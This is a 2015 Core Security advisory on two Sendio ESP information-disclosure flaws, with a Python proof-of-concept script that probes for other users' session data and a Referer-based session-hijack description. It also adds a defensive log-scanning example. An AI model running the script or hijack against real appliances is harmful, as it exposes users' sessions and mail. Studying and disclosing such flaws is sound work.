**Title:** Sendio ESP Information Disclosure Vulnerability
**Advisory ID:** CORE-2015-0010
**Advisory URL:** <https://www.coresecurity.com/core-labs/advisories/sendio-esp-information-disclosure-vulnerability>
**Date published:** 2015-05-22
**Date of last update:** 2015-05-22
**Vendors contacted:** Sendio
**Release mode:** Coordinated release
**Class:** OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200]
**Impact:** Security bypass
**Remotely Exploitable:** Yes
**Locally Exploitable:** No
**CVE Name:** CVE-2014-0999, CVE-2014-8391
Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterprises. Two information disclosure issues were found affecting some versions of this software, and can lead to leakage of sensitive information such as a user's session identifiers and/or a user's email messages.
Other products and versions might be affected too, but they were not tested.
Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on Sendio software Version 7.2.4.
For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not HTTPS web sessions. Sendio recommends that customers who have not upgraded to Version 7.2.4 should disallow HTTP on their Sendio product and only use HTTPS.
This vulnerability was discovered and researched by Martin Gallo from Core Security's Consulting Services Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security's Advisories Team.
The Sendio [1] ESP Web interface authenticates users with a session cookie named 'jsessionid'. The vulnerability [CVE-2014-0999] is caused by the way the Sendio ESP Web interface handles this authentication cookie, as the 'jsessionid' cookie value is included in URLs when obtaining the content of emails. The URLs used by the application follow this format:

```
http://<ESP-web-interface-domain>:<ESP-web-interface-port>/sendio/ice/cmd/msg/body;jsessionid=<session-identifier-value>?id=<message-id>
```
This causes the application to disclose the session identifier value, allowing attackers to perform session hijacking. An attacker might perform this kind of attack by sending an email message containing links or embedded image HTML tags pointing to a controlled web site, and then accessing the victim's session cookies through the 'Referer' HTTP header. Accessing this authentication cookie might allow an attacker to hijack a victim's session and obtain access to email messages or perform actions on behalf of the victim.
The vulnerability [CVE-2014-8391] is caused by an improper handling of users' sessions by the Web interface. Under certain conditions, this could lead to the server disclosing sensitive information that was intended for a different user. This information includes, for instance, other users' session identifiers, email message identifiers or email message subjects. In order to trigger this vulnerability, requests should be authenticated.
The following Python script can be used to trigger this vulnerability under certain circumstances:
```python
import requests

domain = "target.domain.com"  # The target domain
port = 8888  # The target port
jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"  # A valid jsessionid
num = 100000  # Number of requests to make
msgid = 9999999  # A valid message id to baseline the requests

url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, jsessionid)


def make_request(id):
    params = {"id": str(id)}
    headers = {"Cookie": "JSESSIONID=%s" % jsessionid}
    return requests.get(url, params=params, headers=headers)


print("[*] Reaching the target to define baseline")
r = make_request(msgid)
# Content-Length arrives as a string; convert it so the comparison below is numeric
baseline_length = int(r.headers["content-length"])
print("[*] Defined baseline: %d bytes" % baseline_length)

# Repeatedly fetch the same message id; a 200 response whose size differs from
# the baseline indicates content that was not the requested message
for id in range(0, num):
    r = make_request(msgid)
    rlength = int(r.headers["content-length"])
    if r.status_code == 200 and rlength != baseline_length:
        print("\t", r.status_code, rlength, r.text)
    else:
        print("\t", r.status_code, rlength)
```
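As an added example that is not part of the original advisory, the following code takes the defender's side of both issues: it parses the message URL format described above, redacts the session identifier so such URLs can be logged or forwarded safely, and scans constructed access-log lines for session identifiers carried in plain-HTTP URLs ([CVE-2014-0999]) and for one session repeatedly fetching the same message id (the request pattern of the script above). The log line layout, host names and session values are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# The ";jsessionid=<value>" path parameter the Sendio ESP Web interface puts in message URLs
JSESSIONID_RE = re.compile(r";jsessionid=([^/?#;]+)", re.IGNORECASE)
MSG_BODY_PATH = "/sendio/ice/cmd/msg/body"
LOG_LINE_RE = re.compile(r'(\S+) "(\S+) (\S+)" (\d{3})')  # assumed layout: ip "METHOD url" status

def parse_request(url):
    """Return (scheme, jsessionid, message_id) for a msg/body URL, or None for other paths."""
    parts = urlsplit(url)  # urlsplit keeps the ';param' inside .path, unlike urlparse
    m = JSESSIONID_RE.search(parts.path)
    if JSESSIONID_RE.sub("", parts.path) != MSG_BODY_PATH:
        return None
    msg_id = parse_qs(parts.query).get("id", [None])[0]
    return parts.scheme.lower(), (m.group(1) if m else None), msg_id

def redact_session(url):
    """Mask the session identifier so the URL can be logged or forwarded safely."""
    return JSESSIONID_RE.sub(";jsessionid=[REDACTED]", url)

def analyze_log(lines, burst_threshold=20):
    """Flag session ids sent over plain HTTP and one session repeatedly fetching one message id."""
    plaintext_hits, fetches = [], Counter()
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        client, _method, url, _status = m.groups()
        parsed = parse_request(url)
        if parsed is None:
            continue
        scheme, sid, msg_id = parsed
        if scheme == "http" and sid:  # token in a plaintext URL leaks via Referer and proxies
            plaintext_hits.append((client, redact_session(url)))
        if sid and msg_id:
            fetches[(sid, msg_id)] += 1
    bursts = {k: v for k, v in fetches.items() if v >= burst_threshold}
    return {"plaintext_session_urls": plaintext_hits, "repeated_fetches": bursts}

# Constructed sample log: one plain-HTTP request carrying a session id, one session fetching
# the same message 25 times over HTTPS, and one request to an unrelated path
SAMPLE_LOG = (
    ['10.0.0.5 "GET http://esp.example.test:8888/sendio/ice/cmd/msg/body;jsessionid=ABCDEF0123456789?id=42" 200']
    + ['10.0.0.9 "GET https://esp.example.test/sendio/ice/cmd/msg/body;jsessionid=FEDCBA9876543210?id=9999999" 200'] * 25
    + ['10.0.0.7 "GET https://esp.example.test/sendio/ice/cmd/msg/list;jsessionid=0011223344556677" 200']
)
```

Calling `analyze_log(SAMPLE_LOG)` reports the 10.0.0.5 request with its token redacted and the 25-fetch burst keyed by (session, message id); the burst threshold is a tuning knob, not a value from the advisory.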
[1] <http://www.sendio.com/>.
CoreLabs, the research center of Core Security, A HelpSystems Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team comprises seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners so that a fix can be released efficiently and customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2015 Core Security and © 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security advisories team.